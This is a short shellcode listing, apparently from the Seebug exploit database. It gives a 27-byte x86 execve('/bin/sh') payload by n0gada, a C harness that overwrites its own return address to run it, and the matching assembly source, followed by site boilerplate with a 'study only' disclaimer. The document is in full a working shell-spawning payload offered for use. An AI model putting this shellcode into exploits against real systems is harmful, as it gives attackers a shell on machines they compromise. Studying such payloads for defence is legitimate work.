/* execve_sh.c by n0gada 27 bytes. */ #include "stdio.h" char shellcode[]= "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2" "\x52\x57\x54\xb0\x3b\xcd\x80\xe8" "\xee\xff\xff\xff/bin/sh"; int main(void) { int *ret; printf("%d\n",strlen(shellcode)); ret = (int *)&ret+2; *ret = (int)shellcode; return 0; } /********************************************* execve_sh.s .globl main main: jmp strings start: pop %edi xorl %eax,%eax push %eax movl %esp,%edx push %edx push %edi push %esp movb $0x3b,%al int $0x80 strings: call start .string "/bin/sh" *********************************************/
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论